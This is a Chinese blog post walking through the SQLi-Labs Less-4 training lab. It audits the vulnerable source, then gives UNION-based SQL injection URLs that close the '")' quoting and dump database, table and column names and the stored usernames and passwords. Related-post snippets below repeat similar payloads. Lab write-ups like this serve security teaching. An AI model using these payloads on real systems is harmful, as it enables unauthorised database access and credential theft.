SQLI-Labs:Less - 4(UNION 联合注入)

已于 2024-06-06 18:24:42 修改
阅读量263 收藏 6
点赞数 3
分类专栏: # SQLI - Labs 文章标签: web安全 sql
于 2024-06-06 18:24:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43320796/article/details/139507261
版权

Less - 4

SQL注入 - 前置知识:https://blog.csdn.net/weixin_43320796/article/details/139498174

在这里插入图片描述

1. 代码审计

截取一段源代码:

在这里插入图片描述

  1. 可以看到源代码(20行)判断GET请求的id是否有值

  2. 如果有值的就(21行)赋值到$id变量

  3. (27行)后面$id加上了双引号包括

  4. (28行)SQL语句变量($id)存在单括号干扰,加上变量带的双引号变为("$id")

    1. ")闭合前面的双引号单括号,用 --+注释后面的双引号单括号
    2. id参数值为 1") or 1=1 --+拼接 SQL SELECT * FROM users WHERE id = ("1") or 1=1 --+")LIMIT 0,1

  5. 然后代入数据库查询(29-30行)

2. 注入测试

2.1 ORDER BY (排序)

  • 此处可以利用 ORDER BY 猜解字段数量

    注:ORDER BY n,当 n 为数字时代表对第几个字段进行排序,例如:ORDER BY 3;代表对第三个字段进行排序,如果 n > 表的字段数;将会报错。

http://www.sqlilabs.kay.com/Less-4/?id=1") ORDER BY 3 --+

在这里插入图片描述

http://www.sqlilabs.kay.com/Less-4/?id=1") ORDER BY 4 --+

在这里插入图片描述

  • ORDER BY 3正常返回,ORDER BY 4返回错误,可判断表中存在3个字段

2.2 UNION 注入

  • 此处可以利用 UNION 爆出返回数据的位置
http://www.sqlilabs.kay.com/Less-4/?id=1") AND 1=2 UNION SELECT 1,2,3 --+

在这里插入图片描述

  • 可见数据返回点为第二个、第三个字段

3. 构造 Payload

3.1 爆所有数据库名

http://www.sqlilabs.kay.com/Less-4/?id=1") AND 1=2 UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 from information_schema.SCHEMATA --+

在这里插入图片描述

3.2 爆当前数据库所有表名

http://www.sqlilabs.kay.com/Less-4/?id=1") AND 1=2 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 from information_schema.TABLES WHERE TABLE_SCHEMA=database() --+

在这里插入图片描述

3.3 爆 users 表所有字段名

http://www.sqlilabs.kay.com/Less-4/?id=1") AND 1=2 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 from information_schema.COLUMNS WHERE TABLE_NAME='users' --+

在这里插入图片描述

3.4 爆 username,password 数据

http://www.sqlilabs.kay.com/Less-4/?id=1") AND 1=2 UNION SELECT 1,GROUP_CONCAT(username),GROUP_CONCAT(password) from security.users --+

在这里插入图片描述

HC-KAY
关注
专栏目录
sqli-labs测试Less-1到Less-4
bigblue00的博客
06-14 338
Less-1单引号闭合 1、正常页面 2、输入单引号后,页面出现报错信息。 http://192.168.195.110/sqli-labs/Less-1/?id=1’ 3、order by 断段列数,到4时,页面显示异常,说明前面查询了3列。 http://192.168.195.110/sqli-labs/Less-1/?id=1‘ order by 4 – + 4、确认回显位置: 192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,2,3
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1458
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLI-Labs:Less - 1(UNION 联合注入
最新发布
weixin_43320796的博客
06-06 462
联合注入Union Injection)是一种SQL注入攻击技术,它通过在原有的SQL语句中添加UNION操作,将恶意构造的SQL语句与应用程序的SQL语句进行联合,从而对数据库 进行非法操作。这种攻击方式允许攻击者获取敏感数据,或者修改、删除、插入数据。
sqli-labs (less-4)
kukudeshuo的博客
03-07 129
sqli-labs (less-4) 输入 http://127.0.0.1/sql1/Less-4/?id=1 #回显正常 http://127.0.0.1/sql1/Less-4/?id=1' #回显正常 http://127.0.0.1/sql1/Less-4/?id=1" #回显错误 http://127.0.0.1/sql1/Less-4/?id=1")--+ #回显正常 输入1"回显错误,根据回显错误判断为字符型注入 查库 http://127.0.0.1/sql1/Less-4/?id=
sqli-labs Less-4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-03 345
sqli-labs Less-4 本系列文章使用的靶场环境为sqli-labs 环境下载地址:https://github.com/Audi-1/sqli-labs 持续跟新,一直到通过此靶场为止 1.判断注入类型 index.php?id=1" 单引号回显正常,双引号会报错 然后根据报错,我们可以得知这个sql注入页面的使用双引号和括号进行闭合。 2.猜...
sqli-labs—————Less-4
Fly_鹏程万里
05-08 682
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 757
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1318
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sqli--labs 注入sqli-labs-less1~4),与sqlmap的使用
m0_51607644的博客
01-20 543
SQLlabs注入 sqlmap工具注入
[SQLi-LABS] Less-4
Stan冲冲冲
05-11 128
双引号变形字符型注入 ,其余与题三相同 /Less-4/?id=1")--+ /Less-4/?id=1")and extractvalue(1, concat(0x7e, (select version()),0x7e))--+ /Less-4/?id=1") and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database
sql注入系列之Sqli-labs(less-4)
BetsyMyGirl的博客
12-06 878
看完不会来打我
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
Sqli-Labs之less-3
ISNS的博客
02-05 1106
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
sqli less-03
ANYOUZHEN的博客
04-30 844
老规矩,输入id=1 输入id=1’ 查看错误提示 查看源码,猜测可能要在1‘后面加) 查询列表数,发现为3 ?id=1') order by 3--+ch 发现列表为3,接下来就是常规操作了,首先使用联合查询?id=-1') union select 1,2,3--+ 接下来查询数据库名字?id=-1') union select 1,2,database()--+ 然后查询表?id=-1') union select 1,2,group_concat(ta.
sqli-labs练习之 Less-3
博客地址 www.sec0nd.top
06-13 452
文章目录判断是否存在注入注入方法order by 查列union select回显利用联合查询查库查表查列查字段 为了方便了解注入的语句,与上两关一样,在第三关的代码中添加 echo $sql;//输出构造的sql语句 echo "<br>";//换行符 判断是否存在注入 /?id=1 发现id是用括号和引号包裹着的 (‘1’) 注入方法 /?id=1') --+ 剩下的与less1,less2操作一致 order by 查列 ?id=1') order by 4 --+ union
SQLI-Lab】-Less3
xinyue9966的博客
01-22 230
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 通过报错判断类型和闭合 http://192.168.135.149/sqli/Less-3/?i
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1431
SQLI第四关
SQLi-LABS靶场 less-4教学
小明师傅博客
06-11 314
and 1=1 and 1=2 ?id=1’没反应 试一下双引号可以了,发现还有个括号 成功
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值